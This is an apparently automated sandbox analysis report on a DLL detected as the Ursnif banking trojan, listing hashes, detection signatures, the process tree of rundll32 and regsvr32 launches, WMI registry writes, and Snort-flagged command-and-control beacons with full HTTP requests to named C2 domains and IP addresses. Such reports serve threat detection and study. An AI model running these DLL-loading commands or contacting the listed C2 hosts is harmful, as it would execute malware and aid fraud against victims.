Windows Analysis Report direction.dll

Overview

General Information

Sample Name: direction.dll
Analysis ID: 454630
MD5: 499200f6a8e223c057c6e16701740721
SHA1: ef46f9c62b94715b750173074c51100285ff6fe9
SHA256: d7e64f8e65ce586ce2f0a857810b2a23f85140bf5e52e5a824f09787fb2bf45e
Tags: exe

Detection

Ursnif
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Creates an undocumented autostart registry key
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 1112 cmdline: loaddll32.exe 'C:\Users\user\Desktop\direction.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 3492 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6096 cmdline: rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3484 cmdline: regsvr32.exe /s C:\Users\user\Desktop\direction.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 4876 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2412 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6436 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82950 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6692 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6340 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17436 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17446 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5628 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:82994 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 6116 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17448 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4912 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:4876 CREDAT:345098 /prefetch:2 MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • rundll32.exe (PID: 2788 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5496 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6132 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3340 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3164 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Swampland MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Subarachnoid MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5776 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Bechained MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6220 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Unforeseenness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6408 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Incrimination MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6648 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Oversystematic MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6912 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Shieldless MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7148 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Tsarevitch MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1752 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Torchbearer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6008 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Moler MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6468 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Hyperpigmented MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6680 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Adipous MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5208 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Undazzled MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6736 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Peckishness MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4880 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Musophagidae MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1200 cmdline: rundll32.exe C:\Users\user\Desktop\direction.dll,Impracticability MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: direction.dll, Virustotal: Detection: 22%
Source: 2.2.regsvr32.exe.10000000.4.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 4.2.rundll32.exe.10000000.4.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.3.unpack, Avira: Label: TR/Crypt.XPACK.Gen8
Source: direction.dll, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49775 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49776 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49777 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49778 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49779 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49780 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49781 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 162.255.119.73:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49796 -> 162.255.119.73:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49796 -> 162.255.119.73:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49798 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49799 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49801 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49801 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49802 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49803 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49804 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49805 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49807 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49808 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49808 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49809 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49809 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49811 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49811 -> 195.110.59.2:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49812 -> 162.255.119.245:80
Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49815 -> 198.54.117.218:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49818 -> 162.255.119.245:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49820 -> 198.54.117.210:80
Source: global traffic, HTTP traffic detected: GET /jdraw/O3iaA2hu956AXTvBy/pROO_2Bezcv9/4EW_2BE2GiS/RrILj1FVsG0NgC/bEj1Md4FXMzXd_2BsQDkk/2E3fgPGlvmi62b6L/klQsJbFHAOHko_2/BUEsaqmse4HJAFyRlL/vhVfnT0FY/WbXAIRBRE8knIva7gP_2/FTNZLj1OD4sSLJ7_2B_/2BtcED7ctzJHZCgi_2FvX3/yhOQIkIeSXX6q/n.crw HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: alliances.bar; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jdraw/T3XNZT6zZjYD38/irugL9bm6bNKUFAIonM6H/wQL3HgmSBf4ywwYC/sCXsyThPbupkuWW/HhhD2tIgDuvCZc7SAr/u3tIlTv46/0VagixoIliZmOzrIJ8Gv/e15Bb16QLC3Qf1P6zSC/O1DjOyt740UVseH_2FPgwL/iVEyQ72HDAwgH/K2st7xyH/Ngp0jwDDrKGldAKNE1lGwr3/tPn1Qdvj/JvRqnbko7/r.crw HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: alliances.bar; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jdraw/EyekExaBW/AOmJRyo4fJFkPCi2jsPG/WyXo9UA7YyvHWkf5vtk/lKMztsIaB1HB9NTYYsSHgD/fQz2o9_2FQPif/0fDicM8g/8PZEF_2FfgYAg2gcvHBhP_2/FUzJr56vzj/WTbT4OEmvC2xapmxA/FYCvjWtA654H/XdKJrCOAQpA/_2BYDSsnxLQkRX/is5GUyU1jivaQMJ/C0L6SBH.crw HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: alliances.bar; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jdraw/eKIdVq7xEW6JzcVSOG/YGAz0kRmP/C0f1b_2FRes_2FjY8B_2/B_2Fd5AfZVKD5X9IhDZ/d694TVwOFdByJwCY79yvmz/7R58NwfRecoLg/aA_2Bw0R/p0gM8vDZjy0ps_2BUIayQq9/Rn_2Bt_2F4/d1DmvYN0laOIuMrK4/gzoaehTV9xyU/Nf7ZEAISl2G/tYbkdP7D4szBeT/SRCKquNWp/kay.crw HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: alliances.bar; Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /jdraw/HxV_2Bo2vQql/kYmaS26P5Yr/1ei7o7GvahAXm7/WZ9ceXuO8s82IXd2qjhTi/gVDefd7ypFoQitu8/GJUghRHALUiqDy6/hHVuLE2xYoEYA04ng_/2Biq6MgyI/mSB_2FHBwC8tZQO2_2FQ/pZwzJOVW5TItjHxGvRf/VMVOqBmY6oS2fveNdw30jR/tGgzoqtgAAQGtKXKfjWMF/pw.crw HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: alliances.bar; Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: www.msn.com
Source: rundll32.exe, 00000004.00000003.470024227.0000000002BA1000.00000004.00000001.sdmp, String found in binary or memory: http://allianceline.bar
Source: rundll32.exe, 00000004.00000003.421876543.0000000002BA1000.00000004.00000001.sdmp, String found in binary or memory: http://allianceline.bar/jdraw/Gp9teWEG7kYAFsedbNc/UjTWH9ALqm6j8DrZlcMNvN/A7uHg_2BWB8_2/FmuvQjea/W3LR
Source: rundll32.exe, 00000004.00000002.485605152.0000000002BA1000.00000004.00000001.sdmp, String found in binary or memory: http://alliancer.bar
Source: rundll32.exe, 00000004.00000002.484637438.0000000002B4B000.00000004.00000001.sdmp, String found in binary or memory: http://alliancer.bar/jdraw/IxaYG2PhzMHjwCX0WBwc/cmAvcstzmSKw031RJA_/2Fjblh6hTZRKkvCXX1cutr/m_2BxwDBu
Source: rundll32.exe, 00000004.00000002.484637438.0000000002B4B000.00000004.00000001.sdmp, String found in binary or memory: http://alliances.bar/jdraw/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
            Source: Yara matchFile source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001996 GetProcAddress,NtCreateSection,memset,0_2_10001996
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10001A44 NtMapViewOfSection,0_2_10001A44
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100023A5 NtQueryVirtualMemory,0_2_100023A5
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005E5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_005E5A27
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005EB1A5 NtQueryVirtualMemory,0_2_005EB1A5
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_003D0478 NtAllocateVirtualMemory,0_2_003D0478
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_003D04AF NtAllocateVirtualMemory,0_2_003D04AF
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_047F5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_047F5A27
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_047FB1A5 NtQueryVirtualMemory,2_2_047FB1A5
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_02F204AF NtAllocateVirtualMemory,2_2_02F204AF
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_02F20478 NtAllocateVirtualMemory,2_2_02F20478
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04475A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04475A27
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0447B1A5 NtQueryVirtualMemory,4_2_0447B1A5
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04C05A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_04C05A27
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04C0B1A5 NtQueryVirtualMemory,6_2_04C0B1A5
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_027C0478 NtAllocateVirtualMemory,6_2_027C0478
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_027C04AF NtAllocateVirtualMemory,6_2_027C04AF
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_04635A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,9_2_04635A27
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0463B1A5 NtQueryVirtualMemory,9_2_0463B1A5
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_002604AF NtAllocateVirtualMemory,21_2_002604AF
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00260478 NtAllocateVirtualMemory,21_2_00260478
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 29_2_030F04AF NtAllocateVirtualMemory,29_2_030F04AF
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 29_2_030F0478 NtAllocateVirtualMemory,29_2_030F0478
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 33_2_04675A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,33_2_04675A27
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 33_2_0467B1A5 NtQueryVirtualMemory,33_2_0467B1A5
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 33_2_029D04AF NtAllocateVirtualMemory,33_2_029D04AF
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 33_2_029D0478 NtAllocateVirtualMemory,33_2_029D0478
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 35_2_02B95A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,35_2_02B95A27
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 35_2_02B9B1A5 NtQueryVirtualMemory,35_2_02B9B1A5
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 36_2_02F00478 NtAllocateVirtualMemory,36_2_02F00478
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 36_2_02F004AF NtAllocateVirtualMemory,36_2_02F004AF
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 37_2_04955A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,37_2_04955A27
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 37_2_0495B1A5 NtQueryVirtualMemory,37_2_0495B1A5
            Source: direction.dll Static PE information: Number of sections : 27 > 10
            Source: direction.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
            Source: direction.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engine Classification label: mal76.troj.winDLL@72/174@25/6
            Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_005EA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_005EA65C
            Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DFF4812447DAB93837.TMP
            Source: direction.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: direction.dll Virustotal: Detection: 22%
            Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\direction.dll'
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\direction.dll
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Opisthotonos
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4876 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Hydrazo
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Overlock
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\direction.dll,Automobilist
